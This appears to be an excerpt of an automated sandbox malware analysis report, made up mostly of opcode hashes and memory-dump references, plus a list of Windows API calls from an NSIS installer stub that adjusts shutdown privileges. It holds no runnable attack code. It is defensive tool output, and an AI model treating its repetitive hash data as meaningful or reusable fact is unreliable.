                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ba19c0f26efe5298c1fef94d94b1feb89dfd0043257c31c30784c5376e784f55
                                                                                                            • Instruction ID: d5cde2e88e410597af73b1a88c2b75291c87587a487b2a378ef378e8085fe642
                                                                                                            • Opcode Fuzzy Hash: ba19c0f26efe5298c1fef94d94b1feb89dfd0043257c31c30784c5376e784f55
                                                                                                            • Instruction Fuzzy Hash: AA118B307006018FD724CF7ED48195AB7F6EF8965470582AAE40ACB722EB30ED46DB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7a1438829781cfdda0c7b9eadf631433a5ab3bd07786f34ce7ee45ab68a199fb
                                                                                                            • Instruction ID: 17e33b94193045bfbd775c1824744727d89bc1a17ea534793e9c2f12cebd6e43
                                                                                                            • Opcode Fuzzy Hash: 7a1438829781cfdda0c7b9eadf631433a5ab3bd07786f34ce7ee45ab68a199fb
                                                                                                            • Instruction Fuzzy Hash: 280169707006018FE314DF7ED48195AB3F6EFC9654305856AE00ACB722DB30EC46DB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a0cb3713b53bb42a5b88a9c3cd08c9575af9bf3d50b8de2ac51c24c957e70719
                                                                                                            • Instruction ID: 835b339b219f95404c3c76dc7e23864bd08eab653b8394e270de3f2a87e7e156
                                                                                                            • Opcode Fuzzy Hash: a0cb3713b53bb42a5b88a9c3cd08c9575af9bf3d50b8de2ac51c24c957e70719
                                                                                                            • Instruction Fuzzy Hash: ED01D632B042118FDB249F7A585463E77EBBFC46653148439D909DB220FF75CC444690
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2fd8e7126cf3cd566136889b2f10f31c8e962307e6df39af9574cb8e831a3414
                                                                                                            • Instruction ID: 00157a524c9c5be71d5a6997f02845a350a545f65a14fe81ed63ad779bab5725
                                                                                                            • Opcode Fuzzy Hash: 2fd8e7126cf3cd566136889b2f10f31c8e962307e6df39af9574cb8e831a3414
                                                                                                            • Instruction Fuzzy Hash: 0C01B8349016488FEB00DFA4D8102EDBBF1EB8B302F60A139C811B7321EB355806CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5e365bdedef0176dc6e1b5bdfdff8b6d039063991a2778749ad8d02a17a3c8db
                                                                                                            • Instruction ID: bee9a312835a8284908a1e4f9d01a43c46c594f8c441c8bafa8e1a59d7878939
                                                                                                            • Opcode Fuzzy Hash: 5e365bdedef0176dc6e1b5bdfdff8b6d039063991a2778749ad8d02a17a3c8db
                                                                                                            • Instruction Fuzzy Hash: C2F0AF35300214AFDB081AEA9854A7A7ADBEBC83A1B048469FD49CB390DF71CC4143A0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 42b3319982102fa6b55672382b5c973b8aa302378897159b0bd2da96e5a4e18e
                                                                                                            • Instruction ID: 7d6bd0eaefd72bf8e06860594646defb01efb441099d29646f0c18bd08866309
                                                                                                            • Opcode Fuzzy Hash: 42b3319982102fa6b55672382b5c973b8aa302378897159b0bd2da96e5a4e18e
                                                                                                            • Instruction Fuzzy Hash: C701AD31900248CFDB04CFA1D8046E9BBB2EB8A301F001438DA107A250CB325D4ACF96
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aad8842c578e977dd766a02deee618ea57fa527efac7d8611a276c73f19a6598
                                                                                                            • Instruction ID: f3d008b94715c146f170cd9be882039edfa80e531ec621008c722e58f9c80def
                                                                                                            • Opcode Fuzzy Hash: aad8842c578e977dd766a02deee618ea57fa527efac7d8611a276c73f19a6598
                                                                                                            • Instruction Fuzzy Hash: 05F028B0E047189FEB10CFA4C8447AF7BB1FB88360F10452AE40A97641DB35A445CB92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8755bbf5da75ae5bdcc552f25917b8b7dbadc6938c37601012be9ee7bbe0ce64
                                                                                                            • Instruction ID: 75ed1f98a7d6fc6d980bbb105d3fd119ce50bdf3e6684d8fdb4222d803395d3e
                                                                                                            • Opcode Fuzzy Hash: 8755bbf5da75ae5bdcc552f25917b8b7dbadc6938c37601012be9ee7bbe0ce64
                                                                                                            • Instruction Fuzzy Hash: 45F08735D01248CFEB04DFA9D8546EDBBF2EB8B301F60A429C404B3260EB39A801CB54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 66b3245dc47691b3a6f7af73e924099f6c54d0b55760f4af2a340bd032a33cb9
                                                                                                            • Instruction ID: 3f5b64d6284716de02a0de266eb840ffc5ffde61bf177016b57c6937a43212f6
                                                                                                            • Opcode Fuzzy Hash: 66b3245dc47691b3a6f7af73e924099f6c54d0b55760f4af2a340bd032a33cb9
                                                                                                            • Instruction Fuzzy Hash: 42F027203583451BE30526BD1812F6B3B6A9BC7994B05407AE501DB281DE649C0543F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 695431939afbe2c85ca0bf0493231ddcf63f88534ab36bb9b40ea8d89a40d441
                                                                                                            • Instruction ID: cc1f42acac356cafaaf6e65d468e5299455504867405d4dd0c9e022cae9d4bf0
                                                                                                            • Opcode Fuzzy Hash: 695431939afbe2c85ca0bf0493231ddcf63f88534ab36bb9b40ea8d89a40d441
                                                                                                            • Instruction Fuzzy Hash: A7F0A02035030527F20866FD6855B6B22AAAFC5A95F008436E505E7740DF949C0207F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5cf081cfa5802cbc2d6897cbc50f34bfe47463140b2562de18e78b0d6428077c
                                                                                                            • Instruction ID: 18ee786d96493c3c118a7c1aa7983759c5c1f1cea4f254b6d958ca678d91c597
                                                                                                            • Opcode Fuzzy Hash: 5cf081cfa5802cbc2d6897cbc50f34bfe47463140b2562de18e78b0d6428077c
                                                                                                            • Instruction Fuzzy Hash: 83F0D435419F828FE3012B30ACAC26A7FB0FF0B3137856D95E05A86072DB694449CB11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 046a0b7fc9cf36276b5a72b0dcbd7fdf392a66229dd54bd3656f9bcf3e8bf0d7
                                                                                                            • Instruction ID: 4ed0fd38024c2faf2886b5c510588991933739e5de1e555902b80093959d9a74
                                                                                                            • Opcode Fuzzy Hash: 046a0b7fc9cf36276b5a72b0dcbd7fdf392a66229dd54bd3656f9bcf3e8bf0d7
                                                                                                            • Instruction Fuzzy Hash: E8F08C34D04208DFCB04DFB8D44928CBBB6EB05301F6080B9C829A3250E7314A46DF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 00dd73fe2c82ab6956528cbb347d8223a53760fb6e77f6dfd8e1377fcce4be09
                                                                                                            • Instruction ID: d4a6fb3f49bde6ac23e2ca427d60b7bb62fbb0b04912ea3b9efb6b23c617e814
                                                                                                            • Opcode Fuzzy Hash: 00dd73fe2c82ab6956528cbb347d8223a53760fb6e77f6dfd8e1377fcce4be09
                                                                                                            • Instruction Fuzzy Hash: FDE0DF31E163A68EC7039BB09C044EEBF30EE93220B4642EBD050BB052EB311A4DC7B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 81d66a37e5204f6fd7e2f2f237e4045c378d4378581da6e816796ed8d49094d9
                                                                                                            • Instruction ID: 9e273d6258d334fdc3147778ea715ee069f42e3664029ef5be4d5c88e434d04a
                                                                                                            • Opcode Fuzzy Hash: 81d66a37e5204f6fd7e2f2f237e4045c378d4378581da6e816796ed8d49094d9
                                                                                                            • Instruction Fuzzy Hash: 86E01274D04208DFDB04DFB9D54969DBBF5EB49306F6041B9D814A3350E7705E45DB41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7d32c0397a96d279837540d045c9439c77998e4c900890a6fb04ea73fb73291d
                                                                                                            • Instruction ID: cadcff72579d7f552519d570ba00b008b5b76ef7f05123bd900fe4f392f2191d
                                                                                                            • Opcode Fuzzy Hash: 7d32c0397a96d279837540d045c9439c77998e4c900890a6fb04ea73fb73291d
                                                                                                            • Instruction Fuzzy Hash: CED05E32E2022B97CB00EBA5EC048EFF738EED6661B908626D52537140FB713659C7E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35b4d8ed3fb74d59a1d8ea6b6e512cf74db752f79c81fef4ef1892fa45922b7b
                                                                                                            • Instruction ID: 62080220d4702a3d9e17cc7ec76e22d306d23d71ba88138ea41742895b1737e1
                                                                                                            • Opcode Fuzzy Hash: 35b4d8ed3fb74d59a1d8ea6b6e512cf74db752f79c81fef4ef1892fa45922b7b
                                                                                                            • Instruction Fuzzy Hash: B5E086350083884FCF1297B4FC945C93B226B81108F004565D4091B66ADF74178A8B92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                            • Instruction ID: 9968b1f7b0fc0b7bf7e049fa17098cae9ca96013ffba795bad1e7fd54a298b3b
                                                                                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                            • Instruction Fuzzy Hash: F4C0123310C1286A9224504E7C469A3A74CC2C13B5A210177F93D8724054425C4411B4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 56708594aaed229b15a42b2d266b04d183a0ceb1f69b587f3e7cd930992c5bde
                                                                                                            • Instruction ID: 1e6563ccba90ed8e9f3611743c516737a173905cb4b4f728ade9b2865aadaf9f
                                                                                                            • Opcode Fuzzy Hash: 56708594aaed229b15a42b2d266b04d183a0ceb1f69b587f3e7cd930992c5bde
                                                                                                            • Instruction Fuzzy Hash: D2D02B71809288EFDB10CB648809BE8FB7CAB43212F0400EDD41833101C7B00E14C389
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6f67a16c8edc4780d5d872421d744b36b336fa74c2a3a2141288efff0a63f824
                                                                                                            • Instruction ID: a49b0d4513ae75c31e39da14c21a1fcfa162299b027a0c0ab4413b1fe6f5b3f4
                                                                                                            • Opcode Fuzzy Hash: 6f67a16c8edc4780d5d872421d744b36b336fa74c2a3a2141288efff0a63f824
                                                                                                            • Instruction Fuzzy Hash: B6D0A73119C7C44FC702873098644C03FB0AF4320574452EAD886CFF73C155581AC703
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 19d2fb631e864dc3bb9f2fd60bda8bce069e4e7c33d8939080ce5e8cc7ac675f
                                                                                                            • Instruction ID: 172dbbb7d98d7f5a29088f6f021de82aa9641fb5502d9e37e70d487c6155b766
                                                                                                            • Opcode Fuzzy Hash: 19d2fb631e864dc3bb9f2fd60bda8bce069e4e7c33d8939080ce5e8cc7ac675f
                                                                                                            • Instruction Fuzzy Hash: DFD0A77260C6E01FE727522D7820CDFBFB94DC621070846BBD488CB58ADA441A4943D6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 220f78ef50b95c6a7a03734f48a239c6525b78eab23ba8a3e058c45dfd5e5dfa
                                                                                                            • Instruction ID: bad20c98239991be866e451e809097f8c963282db57b99d0f2739875ef20eb8d
                                                                                                            • Opcode Fuzzy Hash: 220f78ef50b95c6a7a03734f48a239c6525b78eab23ba8a3e058c45dfd5e5dfa
                                                                                                            • Instruction Fuzzy Hash: 61D0677BB40008AFCB149F98EC80ADDF776FB98221B548116E915A3260C73199A5DB60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 858b127327e0aa61317c2226d6bd7bf9741786c781b1493685d427da15f68e1d
                                                                                                            • Instruction ID: b2850c55a765eb626bd0c1d6f6525b38ae65faedf2b7d39459bc115d28d938bd
                                                                                                            • Opcode Fuzzy Hash: 858b127327e0aa61317c2226d6bd7bf9741786c781b1493685d427da15f68e1d
                                                                                                            • Instruction Fuzzy Hash: 43D0A93A24C746AFCB078F30881088BFF639FD3200B0484AFE8804E3B1C2208C1A8393
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d9dc4f192a2a4500c9723c98c310b57e4d73e922963faa9b5bfdcdb83412a27c
                                                                                                            • Instruction ID: b5a9394a964c34451eb409367f9e036e8fb3479e7b60ff4ee491c6df2b2099ed
                                                                                                            • Opcode Fuzzy Hash: d9dc4f192a2a4500c9723c98c310b57e4d73e922963faa9b5bfdcdb83412a27c
                                                                                                            • Instruction Fuzzy Hash: 94D0A931801208DFD704DBA0D809BA9B7BCAB03206F0000AC9918632108BB00D00C689
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cce289496120a33dc6b04be534c4d81c02d67090f28e2ba5e90f72b82c986dec
                                                                                                            • Instruction ID: a97979f1f79b1663a93b84c9235eaa2b154233a6a6fe556af6ad497f94abcedb
                                                                                                            • Opcode Fuzzy Hash: cce289496120a33dc6b04be534c4d81c02d67090f28e2ba5e90f72b82c986dec
                                                                                                            • Instruction Fuzzy Hash: 3FC080322047A117671452BCB840BDE53B59DC5651710CA77F405D3104DE587D4641DA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 439307bb7ea31853e234b37baca11b0584a9f97345150a94e7169531056c5b6c
                                                                                                            • Instruction ID: e5be1a9bc5845666ede0ba6e51cb65f371f827e9e7dea4f2911b890d428171df
                                                                                                            • Opcode Fuzzy Hash: 439307bb7ea31853e234b37baca11b0584a9f97345150a94e7169531056c5b6c
                                                                                                            • Instruction Fuzzy Hash: 75C012B5000E098BF6082B50AC0CB3AB6B8B707323FC82910A008128308BB854148A48
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9eff673a47a20a4f249def1db879f3c32a2c397405762396f868e255645d2fa0
                                                                                                            • Instruction ID: 0e8c80baa9ae841313e8aea505793e5aaa33274bc1e41ad82cf41712b58b64a2
                                                                                                            • Opcode Fuzzy Hash: 9eff673a47a20a4f249def1db879f3c32a2c397405762396f868e255645d2fa0
                                                                                                            • Instruction Fuzzy Hash: 7EC0123101435C4BDD01F7F9FC459D5732A77C05047409520A4091666AEFB42ADA4BD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dce0e968077c9ee9822fe4543bb0caea2e768ab9fb76e940ce900bcc16c5fee9
                                                                                                            • Instruction ID: b954b0c5c6a332145c0d6cf970288464ef30272d3cc3feaf135aca8c2d560034
                                                                                                            • Opcode Fuzzy Hash: dce0e968077c9ee9822fe4543bb0caea2e768ab9fb76e940ce900bcc16c5fee9
                                                                                                            • Instruction Fuzzy Hash: 68C04C302687088FF240AA6DD995B5533BCFF85B04F5058E1F5089B665CB66FC044645
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                            • GetVersion.KERNEL32 ref: 004034CE
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                            • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                            • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                            • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                            • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                            • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                            • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                            • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                            • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                            • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                            • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                            • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                            • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                            • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3441113951-334447862
                                                                                                            • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                            • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                            • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
